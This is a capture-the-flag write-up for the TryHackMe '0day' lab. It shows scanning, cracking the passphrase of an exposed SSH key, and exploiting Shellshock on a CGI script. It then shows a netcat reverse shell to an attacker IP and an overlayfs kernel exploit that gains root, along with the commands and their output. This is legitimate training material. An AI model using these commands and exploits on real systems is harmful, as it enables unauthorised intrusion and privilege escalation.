# CTF TryHackMe - 0day

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.174.65
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 10:58 CEST
Nmap scan report for 10.10.174.65
Host is up (0.067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds
```

only 2 ports open
* 22 => SSH
* 80 => HTTP

## Web Enumeration using gobuster

```bash
gobuster dir --url http://10.10.174.65  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================                           
Gobuster v3.1.0                            
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.174.65
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/29 10:59:34 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin              (Status: 301) [Size: 313] [--> http://10.10.174.65/cgi-bin/]
/img                  (Status: 301) [Size: 309] [--> http://10.10.174.65/img/]
/uploads              (Status: 301) [Size: 313] [--> http://10.10.174.65/uploads/]
/admin                (Status: 301) [Size: 311] [--> http://10.10.174.65/admin/]
/css                  (Status: 301) [Size: 309] [--> http://10.10.174.65/css/]
/js                   (Status: 301) [Size: 308] [--> http://10.10.174.65/js/]
/backup               (Status: 301) [Size: 312] [--> http://10.10.174.65/backup/]
/secret               (Status: 301) [Size: 312] [--> http://10.10.174.65/secret/]
/server-status        (Status: 403) [Size: 292]
===============================================================
2022/03/29 11:24:50 Finished
===============================================================
```

Discovered multiple directory.

Let's check **backup** 

It seems to be a private ssh key, with a passphrase


Go to *http://10.10.174.65/backup/*

```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----
```

Trying to crack the passphrase with john the ripper :

```bash
/usr/share/john/ssh2john.py sshpriv.key > sshpriv.key.hash
```

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt sshpriv.key.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (sshpriv.key)     
1g 0:00:00:00 DONE (2022-03-29 11:09) 50.00g/s 25600p/s 25600c/s 25600C/s teiubesc..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Nice, we got the passphrase

```
letmein
```

Another directory seems to be interesting, **cgi-bin**. Maybe it is vulnerable to the shellshock exploit ? Let's check

## Trying to exploit shellshock attack

First try to fuzz this directory to find a cgi script

```bash
gobuster dir --url http://10.10.174.65/cgi-bin  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x cgi -o gobuster_cgi.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.174.65/cgi-bin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi
[+] Timeout:                 10s
===============================================================
2022/03/29 11:26:16 Starting gobuster in directory enumeration mode
===============================================================
/test.cgi             (Status: 200) [Size: 13]
```

Now use nmap to see if this script is vulnerable to shellshock vulnerability

```bash
nmap 10.10.174.65 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 11:36 CEST
Nmap scan report for 10.10.174.65
Host is up (0.061s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10

Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds
```

Yeah! It seems to be vulnerable :D

## Exploit Shellshock

I searched for an exploit. I found this github repo : https://github.com/nccgroup/shocker.git

```bash
python shocker.py -H 10.10.174.65 -c /cgi-bin/test.cgi

   .-. .            .            
  (   )|            |            
   `-. |--. .-.  .-.|.-. .-. .--.
  (   )|  |(   )(   |-.'(.-' |   
   `-' '  `-`-'  `-''  `-`--''  v1.1 
   
 Tom Watson, tom.watson@nccgroup.trust
 https://www.github.com/nccgroup/shocker
     
 Released under the GNU Affero General Public License
 (https://www.gnu.org/licenses/agpl-3.0.html)
    
    
[+] Single target '/cgi-bin/test.cgi' being used
[+] Checking connectivity with target...
[+] Target was reachable
[+] Looking for vulnerabilities on 10.10.174.65:80
[+] 1 potential target found, attempting exploits
[+] The following URLs appear to be exploitable:
  [1] http://10.10.174.65:80/cgi-bin/test.cgi
[+] Would you like to exploit further?
[>] Enter an URL number or 0 to exit: 1
[+] Entering interactive mode for http://10.10.174.65:80/cgi-bin/test.cgi
[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
  > /usr/bin/id
  < uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Let'go we got RCE ! On my way to the reverse shell 


## Trying to get a reverse shell

I used nc command to make my reverse shell

```bash
python shocker.py -H 10.10.174.65 -c /cgi-bin/test.cgi
   .-. .            .
  (   )|            |
   `-. |--. .-.  .-.|.-. .-. .--.
  (   )|  |(   )(   |-.'(.-' |
   `-' '  `-`-'  `-''  `-`--''  v1.1
 Tom Watson, tom.watson@nccgroup.trust
 https://www.github.com/nccgroup/shocker
 Released under the GNU Affero General Public License
 (https://www.gnu.org/licenses/agpl-3.0.html)
     
     
[+] Single target '/cgi-bin/test.cgi' being used
[+] Checking connectivity with target...
[+] Target was reachable
[+] Looking for vulnerabilities on 10.10.174.65:80
[+] 1 potential target found, attempting exploits
[+] The following URLs appear to be exploitable:
  [1] http://10.10.174.65:80/cgi-bin/test.cgi
[+] Would you like to exploit further?
[>] Enter an URL number or 0 to exit: 1
[+] Entering interactive mode for http://10.10.174.65:80/cgi-bin/test.cgi
[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
  > /bin/nc -e /bin/sh 10.9.188.66 9001
```

Yes we are in !

```bash
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.174.65] 50130
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## PrivEsc

Running Linpeas to list escalation ways to privesc. I saw it's a old Linux version

```
uname -a
Linux version 3.13.0-32-generic
```

Let's search for an exploit. I found  this one : https://www.exploit-db.com/exploits/37292

Go to use it, but first we need to compile the script on my kali :

```
gcc ofs.c -o ofs
```

And, send it to the target (with *python3 -m http.server*). Once it's done, go to execute it

```bash
www-data@ubuntu:/tmp$ ./ofs                           
./ofs                           
spawning threads                           
mount #1                            
mount #2                            
child threads done                           
/etc/ld.so.preload created                           
creating shared library                           
gcc: error trying to exec 'cc1': execvp: No such file or directory
couldn't create dynamic library
```

But we got an error :(

I Searched on the web to fix this one. I need to locate cc1 executable

```bash
www-data@ubuntu:/tmp$ find /usr/ -name "*cc1*"
find /usr/ -name "*cc1*"                           
/usr/share/lintian/overrides/libgcc1
/usr/share/terminfo/x/xterm+pcc1                           
/usr/share/doc/libgcc1                           
/usr/lib/gcc/x86_64-linux-gnu/4.8/cc1
```

And then i added */usr/lib/gcc/x86_64-linux-gnu/4.8/cc1* to my PATH :

```bash
www-data@ubuntu:/tmp$ export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.8/cc1
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.8/cc1
```

Finally, run again the exploit

```bash
www-data@ubuntu:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
```

And we rrr root !
